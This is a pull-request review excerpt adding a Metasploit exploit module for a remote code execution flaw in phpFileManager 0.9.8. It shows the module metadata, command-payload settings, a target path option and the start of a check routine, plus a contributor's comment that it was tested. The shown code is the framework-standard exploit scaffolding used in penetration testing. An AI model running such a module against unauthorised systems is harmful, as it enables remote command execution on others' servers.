modules/exploits/multi/http/phpfilemanager_rce.rb

```diff
@@ -0,0 +1,118 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'phpFileManager 0.9.8 Remote Code Execution',
+      'Description'    => %q{
+         This module exploits a remote code execution vulnerability in phpFileManager
+         0.9.8 which is a filesystem management tool on a single file.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'hyp3rlinx', # initial discovery
+          'Jay Turla' # msf
+        ],
+      'References'     =>
+        [
+          [ 'EDB', '37709' ],
+          [ 'URL', 'http://phpfm.sourceforge.net/' ] # Official Website
+        ],
+      'Privileged'     => false,
+      'Payload'        =>
+        {
+          'Space'    => 2000,
+          'DisableNops' => true,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd'
+            }
+        },
+      'Platform'       => %w{ unix win },
+      'Arch'           => ARCH_CMD,
+      'Targets'        =>
+        [
+          ['phpFileManager / Unix', { 'Platform' => 'unix' } ],
+          ['phpFileManager / Windows', { 'Platform' => 'win' } ]
+        ],
+      'DisclosureDate' => 'Aug 28 2015',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The path of phpFileManager', '/phpFileManager-0.9.8/index.php']),
+      ],self.class)
+  end
+
+  def check
+    txt = Rex::Text.rand_text_alpha(8)
+    res = http_send_command("echo #{txt}")
+
```

Comment:
now using the <code>http_send_command</code> @OJ :)

Tried to check it and works pretty fine
![image](https://cloud.githubusercontent.com/assets/3483615/11557696/feb6d5ec-99e8-11e5-97a6-6dd6bfc5844a.png)